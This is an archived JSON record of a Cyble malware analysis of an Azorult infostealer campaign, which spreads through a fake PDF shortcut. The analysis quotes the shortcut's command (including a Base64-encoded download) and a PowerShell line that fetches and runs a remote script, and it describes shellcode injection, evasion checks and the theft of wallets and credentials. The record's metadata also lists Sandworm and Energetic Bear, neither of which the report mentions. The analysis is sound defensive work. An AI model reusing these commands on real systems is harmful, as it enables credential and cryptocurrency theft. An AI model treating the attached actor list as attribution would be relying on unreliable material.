{
	"id": "6ba98164-ce17-4f4e-8bfd-752c9d16bb46",
	"created_at": "2026-04-06T00:16:01.982932Z",
	"updated_at": "2026-04-10T03:37:09.024977Z",
	"deleted_at": null,
	"sha1_hash": "33f41b06ea005010a9b3e1ba454938911abe39e5",
	"title": "Sneaky Azorult Back In Action And Goes Undetected - Cyble",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2859996,
	"plain_text": "Sneaky Azorult Back In Action And Goes Undetected - Cyble\r\nPublished: 2024-01-12 · Archived: 2026-04-05 19:24:59 UTC\r\nKey Takeaways\r\nAzorult malware, identified in 2016, functions as an information-stealing threat.\r\nIt is designed to gather diverse data, including browsing history, cookies, login credentials, and cryptocurrency details.\r\nWe have come across multiple lnk samples that are distributing Azorult, suggesting an ongoing campaign aimed at unsuspecting users.\r\nIn the latest campaign, the Azorult infection begins with a zip file containing a malicious shortcut file posing as a PDF document.\r\nThe shortcut file includes an obfuscated PowerShell script and commands to drop and execute a batch file using the task scheduler.\r\nFurther stages involve downloading an additional loader from a remote server, injecting shellcode, and executing the loader.\r\nThe final step triggers another PowerShell script leading to the execution of the Azorult malware.\r\nThe entire process of downloading and running the loader, as well as the subsequent execution of the final payload, occurs in memory to avoid detection.\r\nOverview\r\nFirst identified in 2016, Azorult malware operates as an information-stealing threat, collecting data such as browsing history, cookies, login credentials, and cryptocurrency details. Additionally, it can function as a downloader for other malware families. This malicious software was offered for sale on Russian underground forums and was specifically crafted to extract a variety of sensitive information from compromised computers.\r\nCyble Research \u0026 Intelligence Labs (CRIL) recently came across several shortcut files posing as PDF files on VirusTotal. While the initial infection vector was not present at the time of identification, phishing emails are common delivery methods in similar attacks. 
Our attention was piqued as the final payload turned out to be a loader that loaded Azorult into memory. Subsequently, we conducted a more in-depth analysis of the malware.\r\nThe Azorult campaign follows a multistage infection chain initiated by a zip file containing a malicious shortcut (lnk) file disguised as a PDF document. Within the shortcut file lies an obfuscated PowerShell script, along with commands to drop a batch file on the system and execute it through the task scheduler. The PowerShell script then proceeds to download an additional loader from a remote server and injects a hardcoded shellcode which subsequently executes the loader. Ultimately, the loader file triggers another PowerShell script, leading to the execution of the final Azorult malware. Notably, all stages of the loader and final payload execution occur in memory without leaving any traces on disk, to evade detection.\r\nTechnical Details\r\nThe figure below shows the infection chain of Azorult.\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nPage 1 of 14\n\nFigure 1 – Azorult Infection Chain\r\nThe figure below shows the citibank_statement_dec_2023.lnk shortcut file.\r\nFigure 2 – Malicious Shortcut File\r\nThe execution process is initiated by the shortcut file, which triggers commands from the %temp% folder location. The command executed by the shortcut file is as follows:\r\n“C:\\Windows\\System32\\cmd.exe” /c echo c3RhcnQgL21pbiBwb3dlcnNoZWxsIC1jb21tYW5kICJJV1IgJ2h0dHBzOi8vbnJndGlrLm14L3dwLWNvbnRlbnQvdXBsb2Fkcy93cC1jb250ZW50LnBocCcg \u003e KgZvPA3S.bat \u0026 certutil -f -decode KgZvPA3S.bat KgZvPA3S.bat \u0026 schtasks /create /f /sc minute /mo 1 /tn n5dMmJEBYc /tr “C:\\Users\\MALWOR~1\\AppData\\Local\\Temp\\KgZvPA3S.bat”\r\nThe command first creates a batch script file KgZvPA3S.bat in the %temp% location containing a Base64 encoded string. This Base64 encoded batch script is then decoded using certutil. 
The command then creates a scheduled task n5dMmJEBYc which executes the newly created batch script KgZvPA3S.bat every minute indefinitely.\r\nThe figure below shows the task scheduler entry.\r\nFigure 3 – Task Scheduler Entry to Execute Batch File\r\nThe decoded batch file KgZvPA3S.bat contains the following command:\r\nstart /min powershell -command “IWR ‘hxxps://nrgtik[.]mx/wp-content/uploads/wp-content.php’ -OutFile ‘%temp%\\fqnIOQdR.js’; schtasks /delete /f /tn n5dMmJEBYc; wscript %temp%\\fqnIOQdR.js”\r\nThis command runs a PowerShell script which downloads the file hxxps://nrgtik[.]mx/wp-content/uploads/wp-content.php and saves it as a JavaScript file, fqnIOQdR.js, in the temp folder. The PowerShell script then deletes the previously created scheduled task entry n5dMmJEBYc and executes the newly dropped fqnIOQdR.js file using wscript.\r\nThe figure below shows the contents of the ‘fqnIOQdR.js’ file.\r\nFigure 4 – Contents of the ‘fqnIOQdR.js’ File\r\nThe malicious script initially verifies the operating system architecture (32-bit or 64-bit) and then checks if the file is named ‘agent.js’. If the file is not named ‘agent.js’, the script duplicates itself into the %programdata% directory with the name ‘agent.js’. Additionally, the script downloads and executes the following two PowerShell scripts:\r\nhxxps://nrgtik[.]mx/wp-content/uploads/agent1.ps1\r\nhxxps://nrgtik[.]mx/wp-content/uploads/agent3.ps1\r\nThe purpose of the PowerShell script ‘agent1.ps1’ remains ambiguous. However, it is presumed that the script is crafted to dynamically identify a specific field within a type of assembly. 
This type of dynamic behaviour is often used by malware to hide its true intent and make analysis more challenging.\r\nThe figure below shows the PowerShell script agent1.ps1.\r\nFigure 5 – PowerShell Script agent1.ps1\r\nThe second PowerShell script, ‘agent3.ps1’, functions as a loader. It retrieves an executable file from a remote server, allocates memory, injects shellcode into that allocated memory, and subsequently initiates a new thread to execute the injected code. The figure below shows the agent3.ps1 PowerShell script.\r\nFigure 6 – agent3.ps1 PowerShell Script\r\nThe script initially downloads a loader executable, helper.exe, from a remote server. Subsequently, it employs the GDT (GetDelegateType) function to dynamically create delegate types and the GPA (GetProcAddr) function to retrieve the addresses of specific functions from the kernel32.dll module.\r\nUsing the GPA function, the script obtains the addresses of functions such as VirtualAlloc(), CreateThread(), and WaitForSingleObject() from kernel32.dll. It then utilizes GDT to create delegates for these functions based on the acquired addresses.\r\nThe script proceeds to allocate memory using VirtualAlloc(), copies shellcode into a global buffer for the downloaded executable, and creates a new thread using CreateThread(), passing the allocated memory with the shellcode and the buffer containing the downloaded executable helper.exe. Finally, it executes the helper.exe thread and waits for the thread to complete execution using WaitForSingleObject(). The script section responsible for loading and executing the shellcode is depicted in the figure below.\r\nFigure 7 – Routine for Loading and Executing the Shellcode\r\nThe loader executable “helper.exe” is a VC++ compiled file carrying an invalid digital signature in Microsoft's name. 
The image below shows the digital certificate details of the loader file.\r\nFigure 8 – Invalid Digital Certificate\r\nUpon execution, helper.exe first checks the language code of the current user using the GetUserDefaultLangID() API and terminates itself if the language code matches any of the codes given below.\r\nLang code  Language and Country\r\n419  Russian\r\n42b  Armenian\r\n82c  Azerbaijani\r\n42c  Azerbaijani (Latin)\r\n423  Belarusian\r\n43f  Kazakh\r\n428  Tajik\r\n442  Turkmen\r\n843  Uzbek (Cyrillic)\r\n443  Uzbek (Latin)\r\n422  Ukrainian\r\nThe presence of languages linked to countries in Eastern Europe and Central Asia in the code indicates a potential affiliation of the Threat Actors (TAs) with this specific geographical region.\r\nAfter conducting the language check, the loader proceeds to verify whether it is operating within a virtual environment. This verification involves collecting information about the display devices through the EnumDisplayDevices() API function and checking for matches with predefined strings. If a match is found with any of the hardcoded strings, such as “Hyper-V,” “VMWare,” “VBoxService.exe,” or “VBoxTray.exe,” the loader terminates its execution. The image below shows the function employed to verify the presence of a virtual environment.\r\nFigure 9 – Anti-VM checks\r\nAfter ensuring that the loader is not running in a virtual environment, it proceeds to extract the MachineGuid from the victim’s machine, specifically from the SOFTWARE\\Microsoft\\Cryptography registry key. 
The image below shows the malware querying the registry to obtain the MachineGuid.\r\nFigure 10 – Loader fetches MachineGuid from the registry\r\nThe acquired GUID will be utilized for communicating with command-and-control (C\u0026C) servers.\r\nSubsequently, the loader creates a mutex named “F3B7D5F3-30F3-BAC3-F3F3-F3F3F3F3F3F3” to prevent the execution of another instance on the same machine. The following image shows the function call with the mutex name used by the loader.\r\nFigure 11 – Mutex Creation\r\nFollowing the creation of the mutex, the loader proceeds to obtain a handle to the Microsoft Enhanced RSA and AES Cryptographic Provider, facilitating cryptographic operations that involve the RSA and AES algorithms, as shown in the image below.\r\nFigure 12 – Loader gets a handle to a cryptographic service provider (CSP)\r\nNext, the loader proceeds to establish a scheduled task named “Firefox Default Browser Agent 458046B0AF4A39CB” utilizing COM objects accessed via the previously fetched globally unique identifiers (GUIDs) from the victim’s machine.\r\nFigure 13 – Loader uses COM Objects\r\nThis task executes the previously downloaded “agent.js” file located in the C:\\ProgramData\\ folder using “wscript.exe”. The image below shows the function used to create the scheduled task.\r\nFigure 14 – Scheduled task to run agent.js file\r\nSubsequently, the loader generates a 20-byte random number through the CryptGenRandom() API. This generated ID, combined with the MachineGUID, is utilized in the initial request to the C\u0026C server to retrieve the configuration data. 
The image below shows the HTTP request from the victim’s machine to the C\u0026C server.\r\nFigure 15 – Loader attempts to retrieve configuration data from C\u0026C\r\nBased on the configuration response received from the C\u0026C, the loader may proceed with other malicious activities on the victim’s computer.\r\nFollowing this, the loader generates another URL string to execute a next-stage PowerShell payload, “sd2.ps1”, from an additional remote server, “hxxps://nrgtik[.]mx/wp-content/uploads”. This entire process is carried out without leaving any file on disk. The image below shows the initialization of the ShellExecute() function to retrieve and execute the PowerShell script from the remote server.\r\nFigure 16 – Loader executes a PowerShell Script from the remote server\r\nPowerShell Script sd2.ps1\r\nThis new PS script downloads configuration data from a specified URL, “hxxp://45[.]90.58.1/index.php”, where $guid is used as a parameter in the URL. The downloaded data is then split into an array using the pipe character (‘|’) as the delimiter. The image below shows the response from the server.\r\nFigure 17 – C\u0026C response\r\nWith the obtained key, the script performs an XOR (exclusive OR) operation on each byte of the encoded content embedded in the PowerShell script “sd2.ps1”. The image below shows part of the encoded content.\r\nFigure 18 – Partial content of the byte array\r\nAfter completing the decoding process, the outcome is the final payload, the Azorult infostealer. The script proceeds to load the decoded assembly into PowerShell memory using [System.Reflection.Assembly]::Load().\r\nAzorult Payload\r\nThe ultimate payload is a 32-bit Azorult .Net executable with the capability to execute various malicious activities within the system. 
Initially, the malicious binary utilizes Curve25519 elliptic curve cryptography to perform the following actions: generate a random private key, clamp it for security purposes, derive the corresponding public key, and compute a shared secret using a peer’s public key. This shared secret can subsequently be employed for symmetric key encryption or other secure communication purposes. The figure below shows the code for key generation.\r\nFigure 19 – Routine for Initiating Encryption\r\nAfter that, Azorult performs several checks through a function named checkVal(), which returns a Boolean value. If any of the checks returns TRUE, the binary terminates execution. The following are the checks conducted by the binary:\r\n1. It verifies the presence of a mutex, and if found, it returns true.\r\n2. It examines whether TwoLetterISOLanguageName is not null and belongs to one of the country codes: AZ, AM, BY, KZ, KG, MD, RU, TJ, TM, UZ, and UA. If the code is null or matches one of the mentioned country codes, it returns true.\r\n3. It checks for the existence of a file named “пароли.txt” (password.txt) on the Desktop. If the file is present, it returns true.\r\n4. The binary queries video controllers in the system using “select Name from Win32_VideoController.” If the Name is “Wine Adapter,” it returns true.\r\n5. Finally, the binary checks the machine name and usernames on the victim’s system. It returns true if the machine name is not equal to “WILLCARTER-PC” and “FORTI-PC” and if the username matches one of “Joe Cage,” “STRAZNJICA.GRUBUTT,” “Paul Jones,” or “PJones.”\r\nThe figure below shows a code snippet for the various checks.\r\nFigure 20 – Azorult Performing Various System Checks\r\nFollowing the execution of these checks, Azorult proceeds to create a unique string for identifying the victim using the putBaseCfg() method. 
This method takes the buildId parameter, and the resulting string follows the format: “BASECFG |” + \u003cMachineGuid\u003e + ” buildId”. The buildId is supplied as a parameter during execution, while the MachineGuid is retrieved from the registry entry “SOFTWARE\\Microsoft\\Cryptography.” The routine responsible for generating this unique identifier string is illustrated in the figure below.\r\nFigure 21 – Azorult Creating Config String\r\nAfter generating the string using the putBaseCfg() method, the malware proceeds to gather system information through the systeminfo() method, which also requires the buildId as a parameter. This function extracts various system details and compiles them into a string. The collected information is then stored in a text file named “System.text.” The following data is extracted from the system:\r\nUUID\r\nMachine Name\r\nUsername\r\nActive Directory Domain name\r\nCPU architecture\r\nGPU\r\nRAM\r\nScreen Resolution\r\nSystem Language\r\nSystem Time zone\r\nOperating system\r\nAnti-Virus Product\r\nInstalled programs\r\nThe figure below shows the code snippet of the systeminfo() method.\r\nFigure 22 – System Information Extracted by Azorult\r\nAfter retrieving system information, Azorult focuses on crypto wallets. The executable includes a method called cryptowallets(), which takes the %appdata% location as a parameter. This method searches for important and sensitive wallet-related files in the system and collects all the data into a directory. 
The list below shows the wallets targeted by the binary:\r\nEthereum, Electrum, Electrum-LTC, ElectronCash, Monero, Jaxx, Guarda, MyMonero, Wasabi, atomic, BlockstreamGreen, BitPay, Exodus, Daedalus, Ledger Live, Trezor\r\nThe figure below shows the routine to extract the crypto wallet-related files.\r\nFigure 23 – Wallets Targeted by Azorult\r\nAfter targeting wallets, the malware then focuses on various browsers, attempting to extract important files from different data locations. The malware specifically targets Mozilla Firefox, Google Chrome, Microsoft Edge, Brave, and Opera. The figure below shows the routine to target the browsers.\r\nFigure 24 – Browsers Targeted by Azorult\r\nAzorult targets multiple applications including Authy, WinAuthy, Discord, FileZilla, OpenVPN, WinSCP, Steam, and Telegram. The figure below shows a code snippet of the malware.\r\nFigure 25 – Azorult Targeting Various Application Programs\r\nAdditionally, Azorult captures a screenshot of the system. The figure below shows the routine to capture the screenshot.\r\nFigure 26 – Azorult Routine for Capturing Screenshot\r\nAfter collecting all the artifacts, Azorult sends the data to the remote server. The server URL is passed by the loader as a parameter to the Azorult binary. The data is compressed and encrypted before being sent to the server. The figure below shows the routine to encrypt the data and send it to the server.\r\nFigure 27 – Routine to Send Encrypted Data to Server\r\nConclusion\r\nAzorult is an insidious information-stealing malware, adept at extracting sensitive data and acting as a downloader for additional threats. 
The new infection chain is part of a complex multistage Azorult campaign that employs obfuscated PowerShell scripts and memory-based execution to conceal its activities. The loader and payload files are never stored on disk, which makes it highly unlikely that they will be detected by security solutions. The campaign’s sophistication, coupled with its availability on underground forums, underscores the ongoing threat it poses to compromised systems.\r\nOur Recommendations\r\nThe initial infiltration for the AZORULT RAT loader typically takes place via phishing websites or emails. It is crucial to only download and install software applications from well-known and trusted sources and to avoid opening emails from unknown senders.\r\nUsers should confirm the legitimacy of websites by verifying the presence of a secure connection (https://) and ensuring the accurate spelling of domain names.\r\nDeploy strong antivirus and anti-malware solutions to detect and remove malicious executable files.\r\nEnhance system security by creating strong, distinct passwords for each account and, whenever feasible, activate two-factor authentication.\r\nRegularly back up data to guarantee the ability to recover it in case of an infection, and keep users informed about the most current phishing and social engineering methods employed by cybercriminals.\r\nMITRE ATT\u0026CK® Techniques\r\nTactic | Technique | Description\r\nExecution (TA0002) | User Execution (T1203) | User opens the malicious shortcut file\r\nExecution (TA0002) | Command and Scripting Interpreter: Windows Command Shell (T1059.003) | Azorult can execute itself using cmd.exe\r\nCredential Access (TA0006) | Credentials from Password Stores: Credentials from Web Browsers (T1555.003) | The user opens the malicious shortcut file\r\nCredential Access (TA0006) | Input Capture: GUI Input Capture (T1056.002) | Azorult can take screenshots\r\nDiscovery (TA0007) | File and Directory Discovery (T1083) | Azorult can discover application files and directories\r\nCommand and Control (TA0011) | Non-Application Layer Protocol (T1095) | Azorult uses TCP for C\u0026C communication\r\nExfiltration (TA0010) | Exfiltration Over C\u0026C Channel (T1041) | Exfiltration over C\u0026C channel\r\nIndicators of Compromise (IOCs)\r\nSource: https://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/"
	],
	"report_names": [
		"sneaky-azorult-back-in-action-and-goes-undetected"
	],
	"threat_actors": [
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434561,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/33f41b06ea005010a9b3e1ba454938911abe39e5.pdf",
		"text": "https://archive.orkl.eu/33f41b06ea005010a9b3e1ba454938911abe39e5.txt",
		"img": "https://archive.orkl.eu/33f41b06ea005010a9b3e1ba454938911abe39e5.jpg"
	}
}